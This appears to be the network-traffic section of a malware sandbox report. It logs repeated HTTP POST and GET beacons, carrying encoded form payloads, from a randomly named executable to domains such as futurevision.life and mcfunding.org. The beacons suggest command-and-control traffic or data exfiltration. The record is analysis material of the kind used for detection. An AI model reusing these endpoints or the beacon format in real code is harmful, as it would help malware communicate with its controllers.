                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?NjHpTfh=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZP8CAmIyANUKvAf3+5N6bOzfwLz/Gtq1ZNC0AtH/TFhPdx4Q==&1fo=GF14svyhH44dt"}</script></head></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  5 | 192.168.2.8 | 49713 | 203.161.49.193 | 80 | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 22, 2024 14:45:20.776297092 CET | 822 | OUT | POST /hxmz/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.futurevision.life
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.futurevision.life
                                                                  Referer: http://www.futurevision.life/hxmz/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Ascii: NjHpTfh=8cwN9mJXk9DUEr8m8paBS3F/bfli4c/KrAu9frQcBpqLZVKXmFksWBjEBzIsz/RgqGl6vnOweH3INEEMZErcudQrdNr95SiLxC4sXkeldQoF489/XoTcpyBMvaCdQV5MnrHMboGagsUoa957S9HepvRtchsyQVNLRU0a6UGqZyj6iXj0+tl7LCAk8ARJlNtCZpMaKio=
                                                                  Nov 22, 2024 14:45:21.988147020 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Fri, 22 Nov 2024 13:45:21 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  6 | 192.168.2.8 | 49714 | 203.161.49.193 | 80 | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 22, 2024 14:45:23.435933113 CET | 842 | OUT | POST /hxmz/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.futurevision.life
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.futurevision.life
                                                                  Referer: http://www.futurevision.life/hxmz/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Ascii: NjHpTfh=8cwN9mJXk9DUW/Amv4aBa3F8efli28/OrAi9fqUyB/6LexaXnEksRBjEKTIp3/RvqGpyvkWweHjINAUMYz/f8dQpWtr/2yiLxC4sXkaPdQwF7NN/VJTdkSBToaCdBF4LnrHLbte0gqYoa4d7TozfjvRjTBt2DWo1JWIZySePTwX7qBSekPt9ICoP8D5/g6wqDKcqU1+744CqQjPPPcyl+ouloGIb
                                                                  Nov 22, 2024 14:45:24.696316957 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Fri, 22 Nov 2024 13:45:24 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  7 | 192.168.2.8 | 49715 | 203.161.49.193 | 80 | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 22, 2024 14:45:26.137670994 CET | 1859 | OUT | POST /hxmz/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.futurevision.life
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1244
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.futurevision.life
                                                                  Referer: http://www.futurevision.life/hxmz/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Nov 22, 2024 14:45:27.401501894 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Fri, 22 Nov 2024 13:45:27 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  8 | 192.168.2.8 | 49716 | 203.161.49.193 | 80 | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 22, 2024 14:45:28.842729092 CET | 558 | OUT | GET /hxmz/?NjHpTfh=xeYt+TVrluKccowhuJaDBktUUZBiwtnijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70ewIeMOmwh+ftSU1XmKvTSoNxNN/QLOdtg9qtYWOUm1ByQ==&1fo=GF14svyhH44dt HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.futurevision.life
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Nov 22, 2024 14:45:30.073261023 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Fri, 22 Nov 2024 13:45:29 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  9 | 192.168.2.8 | 49717 | 3.33.130.190 | 80 | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 22, 2024 14:45:35.744465113 CET | 828 | OUT | POST /slxp/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.schedulemassage.xyz
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.schedulemassage.xyz
                                                                  Referer: http://www.schedulemassage.xyz/slxp/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Ascii: NjHpTfh=dp+M27OzYBUBgIP+YWWkqUYaHOBZ3+2imQV/AL5mh96onii4qxRTB6oAPVKKTmFia+YMSluR5CEcNNmRuJZF3toKnaiIwX6qzreYDnsNrmIEbm+QMWe6SZnZl5BAbaBqJTzd1nhQjeZOiyUY2av5M/8GYy3fj5vpW23ULjTVDv5B2B1LGvhPiO5Lbal4Ig1JnaeKJpw=


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  10 | 192.168.2.8 | 49718 | 3.33.130.190 | 80 | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 22, 2024 14:45:38.399326086 CET | 848 | OUT | POST /slxp/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.schedulemassage.xyz
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.schedulemassage.xyz
                                                                  Referer: http://www.schedulemassage.xyz/slxp/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Ascii: NjHpTfh=dp+M27OzYBUBhp/+dxCkjUYFCOBZ9e3rmQp/AKNMhveonGu44EtTA6oAXFLAXmF1a+UiShmR5CAcNJiRu6xGtdoIu6iO936qzreYDjErrmQEb2uQN0m5Npnei5BAR6BuJTzj1i4YjchOi3wY2Lv+D/9Ncy20k4SQSUjNHB/OBYZOz3EhcNpJhORgbZNONXoh95O6X+mA6s+5nfMfcSx2/MYzC307


Session ID: 11 | Source IP: 192.168.2.8 | Source Port: 49719 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1240 | Process: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe

Timestamp: Nov 22, 2024 14:45:41.062104940 CET | Bytes transferred: 1865 | Direction: OUT
POST /slxp/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.schedulemassage.xyz
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1244
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.schedulemassage.xyz
                                                                  Referer: http://www.schedulemassage.xyz/slxp/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36


Session ID: 12 | Source IP: 192.168.2.8 | Source Port: 49720 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1240 | Process: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe

Timestamp: Nov 22, 2024 14:45:43.709770918 CET | Bytes transferred: 560 | Direction: OUT
GET /slxp/?NjHpTfh=QrWs1MGbYyQFoq3pAiasxQ0vJYE0z/vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOs9wYs5314wmawIeBCSIctWMwFCyIHUycaencn4NBaeE5ag==&1fo=GF14svyhH44dt HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.schedulemassage.xyz
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Timestamp: Nov 22, 2024 14:45:44.801428080 CET | Bytes transferred: 413 | Direction: IN
HTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Fri, 22 Nov 2024 13:45:44 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 273
                                                                  Connection: close
                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?NjHpTfh=QrWs1MGbYyQFoq3pAiasxQ0vJYE0z/vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOs9wYs5314wmawIeBCSIctWMwFCyIHUycaencn4NBaeE5ag==&1fo=GF14svyhH44dt"}</script></head></html>


Session ID: 13 | Source IP: 192.168.2.8 | Source Port: 49721 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1240 | Process: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe

Timestamp: Nov 22, 2024 14:45:50.654340029 CET | Bytes transferred: 810 | Direction: OUT
POST /0598/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.mcfunding.org
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.mcfunding.org
                                                                  Referer: http://www.mcfunding.org/0598/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Ascii: NjHpTfh=g4UhOENgM8To+Ja5Z0omnrCSJxeZXrCINekvDjkVn5LXsKXOaITcXDqvfjJqBqnz7YJMei2A0rSoreF/uHbIfdfviB3OTPddqx1/Jk2vZFdj3jgv7Et3Rm0wqHywVWkpjdlHBWQrARQRiw/83Knx7B2nHr4b810gvq9Flm+OjoACSy+AOuddjyvFasA/6MkcFVeVZ/Q=


Session ID: 14 | Source IP: 192.168.2.8 | Source Port: 49722 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1240 | Process: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe

Timestamp: Nov 22, 2024 14:45:53.367153883 CET | Bytes transferred: 830 | Direction: OUT
POST /0598/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.mcfunding.org
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.mcfunding.org
                                                                  Referer: http://www.mcfunding.org/0598/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Ascii: NjHpTfh=g4UhOENgM8To+pq5bVomhLCVUBeZdLCENegvDixKkK/XiI/ObK7cQDqvQDJzFqme7Z0mejaA0rGorct/p0DLZNftvh3IQ/ddqx1/JgfyZFVj3TQv5lt0cG03pHywCGktjdlxBTxAAToRixv83bn2wB2hDr4LxXkwvYIigA6hnIAUXEPqUMVbgyHuavoJ/750f2OlHoHtP6PrfGtgHh5O+hNTO9GM


Session ID: 15 | Source IP: 192.168.2.8 | Source Port: 49723 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1240 | Process: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe

Timestamp: Nov 22, 2024 14:45:56.025079966 CET | Bytes transferred: 1847 | Direction: OUT
POST /0598/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.mcfunding.org
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1244
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.mcfunding.org
                                                                  Referer: http://www.mcfunding.org/0598/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36


Session ID: 16 | Source IP: 192.168.2.8 | Source Port: 49724 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1240 | Process: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe

Timestamp: Nov 22, 2024 14:45:58.682178974 CET | Bytes transferred: 554 | Direction: OUT
GET /0598/?1fo=GF14svyhH44dt&NjHpTfh=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dMSPmSyMXvFwuhBmNF6SR00f5xEMx0RhVmciiGarBUFx9Q== HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.mcfunding.org
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Timestamp: Nov 22, 2024 14:45:59.907481909 CET | Bytes transferred: 413 | Direction: IN
HTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Fri, 22 Nov 2024 13:45:59 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 273
                                                                  Connection: close
                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?1fo=GF14svyhH44dt&NjHpTfh=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dMSPmSyMXvFwuhBmNF6SR00f5xEMx0RhVmciiGarBUFx9Q=="}</script></head></html>


Session ID: 17 | Source IP: 192.168.2.8 | Source Port: 49725 | Destination IP: 198.252.98.54 | Destination Port: 80 | PID: 1240 | Process: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe

Timestamp: Nov 22, 2024 14:46:05.637442112 CET | Bytes transferred: 822 | Direction: OUT
POST /y3dc/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.migorengya8.click
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.migorengya8.click
                                                                  Referer: http://www.migorengya8.click/y3dc/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Ascii: NjHpTfh=vjjmaXWtymtuiwMz4XtzqFQTh6ivwkJ8hKF603BQ3nKK+Mop8UBqOppcf3vpaGrRN1nciD8kSF99cMbB+MpMfTjpy+5m6RoxAv8qnDjGa4xhHQqQ2e5BbI9800IRQ70i1IPM/Jf2E5KcMusIhRM2VVbMKpQqeS7CNJ6poBXEnkFVctAFIIvuHzqVjzU6Iu5TxOoXvnQ=
Timestamp: Nov 22, 2024 14:46:06.938314915 CET | Bytes transferred: 1033 | Direction: IN
HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Fri, 22 Nov 2024 13:46:06 GMT
                                                                  server: LiteSpeed
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID: 18 | Source IP: 192.168.2.8 | Source Port: 49726 | Destination IP: 198.252.98.54 | Destination Port: 80 | PID: 1240 | Process: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe

Timestamp: Nov 22, 2024 14:46:08.293920994 CET | Bytes transferred: 842 | Direction: OUT
POST /y3dc/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.migorengya8.click
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.migorengya8.click
                                                                  Referer: http://www.migorengya8.click/y3dc/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Ascii: NjHpTfh=vjjmaXWtymtujTUzrkVzslQcuaiv5EJ4hKB602F53RiK9tYpuFBqe5pcKHujVmrgN1qjiDAkSFp9cNrB+/BPfDjr+e5g0xoxAv8qnD3oa45hHgaQkP5OWo9/kEIRDr0m1IOj/ICjE/GcMrAIiD0pcVbKOpRrRxK0LqmMpDWg7Ht8Q7xvSqnoEzC+jw8MNZk7rt4nxwF5KWRMwhEe6Y0ged5papVp
Timestamp: Nov 22, 2024 14:46:09.548312902 CET | Bytes transferred: 1033 | Direction: IN
HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Fri, 22 Nov 2024 13:46:09 GMT
                                                                  server: LiteSpeed
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                  19         | 192.168.2.8 | 49727       | 198.252.98.54  | 80               | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Timestamp                           | Bytes transferred | Direction | Data
                                                                  Nov 22, 2024 14:46:10.945439100 CET | 1859              | OUT       | POST /y3dc/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.migorengya8.click
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1244
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.migorengya8.click
                                                                  Referer: http://www.migorengya8.click/y3dc/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Ascii: NjHpTfh= [TRUNCATED]
                                                                  Nov 22, 2024 14:46:12.157075882 CET | 1033              | IN        | HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Fri, 22 Nov 2024 13:46:11 GMT
                                                                  server: LiteSpeed
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                  20         | 192.168.2.8 | 49728       | 198.252.98.54  | 80               | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Timestamp                           | Bytes transferred | Direction | Data
